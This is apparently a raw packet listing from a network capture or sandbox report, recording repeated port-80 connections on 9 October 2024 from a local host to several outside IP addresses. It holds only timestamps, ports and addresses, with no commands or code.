                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.478288889 CEST8049785176.57.64.102192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.536225080 CEST4979480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.630954981 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.631185055 CEST4979480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.636502981 CEST4979480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.730819941 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.739375114 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.739388943 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.739402056 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.739764929 CEST4979480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.741730928 CEST4979480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.744728088 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.744993925 CEST4979480192.168.11.20199.59.243.227
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.836391926 CEST8049794199.59.243.227192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:46.755183935 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:47.768095970 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.133245945 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.133508921 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.138307095 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.138484955 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.141407013 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.508451939 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.716856956 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.767888069 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.133547068 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.133563042 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.133822918 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499608994 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499694109 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499835014 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499870062 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.499900103 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.500099897 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.642709017 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.871454954 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.871613026 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.872560024 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.872683048 CEST8049795103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.872744083 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:49.872915983 CEST4979580192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:50.660234928 CEST4979680192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.034955978 CEST8049796103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.035109997 CEST4979680192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.042990923 CEST4979680192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.403906107 CEST8049796103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583117962 CEST8049796103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583220005 CEST8049796103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583344936 CEST8049796103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583420992 CEST4979680192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583501101 CEST8049796103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583517075 CEST8049796103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583688021 CEST4979680192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583730936 CEST8049796103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583776951 CEST8049796103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583925962 CEST8049796103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.583940029 CEST4979680192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.584050894 CEST8049796103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.584096909 CEST4979680192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.584235907 CEST8049796103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.584264040 CEST8049796103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:51.584450960 CEST4979680192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:52.548372030 CEST4979680192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:53.565887928 CEST4979780192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:53.928714991 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:53.928913116 CEST4979780192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:53.936989069 CEST4979780192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:53.937038898 CEST4979780192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:53.937088013 CEST4979780192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.299602032 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.299681902 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.300082922 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.481220961 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.481236935 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.481370926 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.481456995 CEST4979780192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.481704950 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.481720924 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.481946945 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.482068062 CEST4979780192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.482249975 CEST4979780192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.482306004 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.482359886 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.482438087 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.482556105 CEST4979780192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.483048916 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.483062029 CEST8049797103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.483211994 CEST4979780192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:55.438308954 CEST4979780192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:56.455928087 CEST4979880192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:56.819371939 CEST8049798103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:56.819560051 CEST4979880192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:56.824830055 CEST4979880192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:57.298561096 CEST8049798103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:57.299096107 CEST8049798103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:57.299329042 CEST4979880192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:57.300826073 CEST4979880192.168.11.20103.247.8.53
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:57.662853956 CEST8049798103.247.8.53192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:10.468472958 CEST4979980192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:10.599369049 CEST804979972.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:10.599560976 CEST4979980192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:10.607431889 CEST4979980192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:10.741637945 CEST804979972.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:10.741650105 CEST804979972.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:10.741848946 CEST4979980192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:12.122210979 CEST4979980192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:13.139971972 CEST4980080192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:13.270945072 CEST804980072.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:13.271169901 CEST4980080192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:13.279257059 CEST4980080192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:13.412662983 CEST804980072.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:13.412674904 CEST804980072.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:13.412849903 CEST4980080192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:14.793497086 CEST4980080192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:15.811038017 CEST4980180192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:15.942609072 CEST804980172.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:15.942853928 CEST4980180192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:15.950918913 CEST4980180192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:15.950939894 CEST4980180192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:15.950992107 CEST4980180192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:16.082412958 CEST804980172.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:16.082425117 CEST804980172.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:16.082434893 CEST804980172.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:16.082456112 CEST804980172.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:16.082464933 CEST804980172.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:16.085145950 CEST804980172.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:16.085158110 CEST804980172.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:16.085344076 CEST4980180192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:17.464765072 CEST4980180192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:18.482300997 CEST4980280192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:18.613291979 CEST804980272.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:18.613563061 CEST4980280192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:18.618822098 CEST4980280192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:18.753396034 CEST804980272.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:18.753633976 CEST804980272.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:18.753648043 CEST804980272.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:18.753890991 CEST4980280192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:18.755811930 CEST4980280192.168.11.2072.14.178.174
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:18.886648893 CEST804980272.14.178.174192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:23.762670994 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:24.775670052 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:26.790884018 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:30.805627108 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:38.819509029 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:45.851628065 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:45.927355051 CEST4977880192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:46.864588976 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:48.676795006 CEST4977980192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:48.879807949 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:51.426132917 CEST4978080192.168.11.2085.159.66.93
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:52.894547939 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:00.908396959 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:07.940546036 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:08.953552961 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:10.968733072 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:14.983470917 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:22.997318029 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:30.029413939 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:31.042460918 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:33.057638884 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:37.072376966 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:45.086276054 CEST4974980192.168.11.2023.231.158.3
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.117217064 CEST4980380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.212044954 CEST8049803172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.212285995 CEST4980380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.221096992 CEST4980380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.315915108 CEST8049803172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.328573942 CEST8049803172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.328742981 CEST8049803172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.328753948 CEST8049803172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.328766108 CEST8049803172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:56.328946114 CEST4980380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:57.724101067 CEST4980380192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.741813898 CEST4980480192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.840646029 CEST8049804172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.840812922 CEST4980480192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.849598885 CEST4980480192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.945784092 CEST8049804172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.958468914 CEST8049804172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.958524942 CEST8049804172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.958544970 CEST8049804172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.958779097 CEST4980480192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.959184885 CEST8049804172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:42:58.959414959 CEST4980480192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:00.364140034 CEST4980480192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.381656885 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.475953102 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.476135015 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.484154940 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.484174013 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.484235048 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578512907 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578624964 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578636885 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578645945 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578741074 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578986883 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.578999043 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.599069118 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.599123001 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.599147081 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.599396944 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.600013018 CEST8049805172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:01.600150108 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:02.988604069 CEST4980580192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.006237984 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.100879908 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.101176977 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.106813908 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.201445103 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213773966 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213865995 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213880062 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213892937 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213901043 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.213910103 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.214099884 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.214217901 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.214483023 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.214618921 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.217746019 CEST4980680192.168.11.20172.67.191.241
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:04.312375069 CEST8049806172.67.191.241192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.223931074 CEST4980780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.319282055 CEST8049807104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.319470882 CEST4980780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.327955961 CEST4980780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.422425032 CEST8049807104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.933917999 CEST8049807104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.933929920 CEST8049807104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.934124947 CEST4980780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.935147047 CEST8049807104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:09.935374975 CEST4980780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:10.830611944 CEST4980780192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:11.848165035 CEST4980880192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:11.942164898 CEST8049808104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:11.942415953 CEST4980880192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:11.950274944 CEST4980880192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:12.044244051 CEST8049808104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:12.194515944 CEST8049808104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:12.194605112 CEST8049808104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:12.194617033 CEST8049808104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:12.194839954 CEST4980880192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:12.195182085 CEST8049808104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:12.195324898 CEST4980880192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:13.455044031 CEST4980880192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.472577095 CEST4980980192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.567735910 CEST8049809104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.567969084 CEST4980980192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.575975895 CEST4980980192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.575999022 CEST4980980192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.576071978 CEST4980980192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.672930956 CEST8049809104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.672952890 CEST8049809104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.672964096 CEST8049809104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.672971964 CEST8049809104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:14.672981024 CEST8049809104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:15.028693914 CEST8049809104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:15.028708935 CEST8049809104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:15.028719902 CEST8049809104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:15.028948069 CEST4980980192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:16.079463005 CEST4980980192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.097338915 CEST4981080192.168.11.20104.21.50.202
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.191900969 CEST8049810104.21.50.202192.168.11.20
                                                                                                                                                                                                                                                              Oct 9, 2024 13:43:17.192143917 CEST4981080192.168.11.20104.21.50.202
